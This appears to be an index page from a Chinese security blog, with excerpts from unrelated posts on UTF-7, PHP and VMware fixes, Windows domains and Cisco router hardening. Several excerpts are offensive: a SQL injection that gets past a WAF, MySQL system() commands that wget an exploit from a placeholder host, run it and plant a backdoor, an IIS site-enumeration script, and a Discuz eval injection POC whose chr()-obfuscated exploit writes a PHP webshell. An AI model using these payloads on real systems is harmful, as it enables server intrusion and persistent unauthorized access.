作者:[肖允锋]
MIME(Multipurpose Internet Mail Extensions) 中没有将 Unicode 定义为一种许可的字符集,也没有规定其如何编码。虽然已有其他的一些编码格式(如:UTF-8)应用于邮件当中,但它们使用了128到255之间的数值去表示 Unicode 字符,这对于非 US-ASCII 的字符集的编解码是不利的。
因为很多邮件网关和系统无法正确地提交八位的 US-ASCII 码,这样使用扩展的 US-ASCII 的字符将出现丢失位(bit)的情况。由于 UTF-7 只使用 7 位(bit),最高位不使用,因此 UTF-7 编码能够完整的在这些系统中进行传输。
对于部分US-ASCII 字符和 US-ASCII 以外的字符,UTF-7 采用变字节顺序的方法进行解码,并使用 US-ASCII 中的保留字符作为转换字符(shift character)。以下是 UTF-7 编码和解码规则的说明。
阅读全文…
当php的服务器端缺少libmcrypt.dll,使用函数mcrypt_module_open会出现此错误。
在服务器上做如下设置可解决。
下载一个libmcrypt.dll文件
1.将libmcrypt.dll复制到php安装目录下的ext目录下
2.到打开php.ini文件,打开它
3.找到; Directory in which the loadable extensions (modules) reside.
extension_dir = “./”
这两行,要使extension_dir指向的目录下能找到libmcrypt.dll(一般指向php安装目录下的ext目录就OK了)
5.找到;Windows Extensions 项下面的;extension=php_mcrypt.dll这一行,去掉前面的分号注释
文/meao
昨天在检测一个外国PHP网站时
在id=255后加’出现forbidden
于是我and 1=1正常 and 1=2出错
说明肯定有注入
接着我order by猜出字段
然后union select 1,2,3,4 //悲剧的又出现了forbidden
肯定是做了过滤了
后来构造了语句id=-255+union+/*!select*/+1,2,3,4 阅读全文…
文/xuser
一般注入多用于在mssql和mysql两类数据库中,如mssql+asp、 mysql+php则是最为常见的搭配环境。不同的网站应用的数据库也大不一样,根据数据库的处理能力、负载等多重因素决定。诸如mssql与mysql 各类注入问题在网上已是随处可见,本文主要述说下关于少见的一类数据库注入:PostgreSQL。
关于PostgreSQL
PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),可以说是目前世界上最先进,功能最强大的自由数据库管理系统。 阅读全文…
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的 范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。
按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是 按照我的的方法,没有必要再去找web路径了,直接执行
直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,好比,下载exp执行, 搞到 root权限,然后装后门。
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system wget http://www.xxx.com/xxxx ;
mysql>system chmod +x xxxx; mysql>system ./xxxx;
Form:http://www.nuanyue.com/%e5%9f%9f%e7%8e%af%e5%a2%83%e4%b8%8b%e7%9a%84%e6%b8%97%e9%80%8f.html
首先还是先简要看一下域的概念吧:
域 (Domain) 是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件 和打印机等设备资源,使不同的域之间实现网络资源的共享与管理。
域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。域管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者管理其他的域;每个域都有自己的安全策 略,以及它与其他域的安全信任关系。
原创 解决VMWare的VMware USB Arbitration Service服务与索爱手机驱动冲突的问题 收藏
现象:VMWare内不能识别USB设备。启动VMware USB Arbitration Service服务时提示:错误31:连接到系统上的设备没有发挥作用。
确认:通过事件查看器可以看到内容形如“Detected unrecognized USB driver (\Driver\seehcri).”的警告信息,在Windows\System32\Drivers目录下可以找到seehcri.sys文件
原因:安装索爱PC Suite之后,seehcri.sys会替换系统中原有的USB驱动,卸载PC Suite不会卸载seehcri.sys
解决:下载AutoRuns for Windows v8.61,解压运行autoruns.exe,在Drivers页找到seehcri.sys,删除。重启系统,进入设备管理器,删除打黄色叹号的USB设备,扫描硬件改动,重新安装驱动程序。
阅读全文…
Form:http://www.80pentest.com/?p=887
旁站路径问题
1、读网站配置。
2、用以下VBS
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
Msgbox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ”
Usage:Cscript vWeb.vbs”,4096,”Lilo”
WScript.Quit
End If
Set ObjService=GetObject
(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name)
Then
Set OService=GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err
<> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[" &
OService.ServerComment & "]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds,”:”,” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web,” “,”"),”}{“)(2),”}”,”")
Next
WScript.Echo “Path : ” & VDirObj.Path
End If
Next 阅读全文…
author:alibaba global.func.php function sendpm($toid, $subject, $message, $fromid = '') { if($fromid === '') { require_once DISCUZ_ROOT.'./uc_client/client.php'; $fromid = $discuz_uid; } if($fromid) { uc_pm_send($fromid, $toid, $subject, $message); } else { global $promptkeys; if(in_array($subject, $promptkeys)) { $type = $subject; } else { extract($GLOBALS, EXTR_SKIP); require_once DISCUZ_ROOT.'./include/discuzcode.func.php'; eval("\$message = addslashes(\"".$message."\");"); //无过滤,可插入代码 $type = 'systempm'; $message = '<div>'.$subject.' {time}'.discuzcode($message, 1, 0).'</div>'; } sendnotice($toid, $message, $type); } } POC: 1. admincp.php?frames=yes&action=members&operation=newsletter 2. 发短消息,通知内容为:{${phpinfo()}} EXP - (fputs(fopen('forumdata/cache/cache_01.php','w'),'<?php eval($_POST[cmd])?>');) : ${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
一,路由器访问控制的安全配置
1,严格控制可以访问路由器的管理员。任何一次维护都需要记录备案。
2,建议不要远程访问路由器。即使需要远程访问路由器,建议使用访问控制列表和高强度的密码控制。
3,严格控制CON端口的访问。具体的措施有:
A,如果可以开机箱的,则可以切断与CON口互联的物理线路。
B,可以改变默认的连接属性,例如修改波特率(默认是96000,可以改为其他的)。
C,配合使用访问控制列表控制对CON口的访问。
如:Router(Config)#Access-list 1 permit 192.168.0.1
Router(Config)#line con 0
Router(Config-line)#Transport input none
Router(Config-line)#Login local
Router(Config-line)#Exec-timeoute 5 0
Router(Config-line)#access-class 1 in
Router(Config-line)#end
D,给CON口设置高强度的密码。
4,如果不使用AUX端口,则禁止这个端口。默认是未被启用。禁止如:
Router(Config)#line aux 0
Router(Config-line)#transport input none
Router(Config-line)#no exec 阅读全文…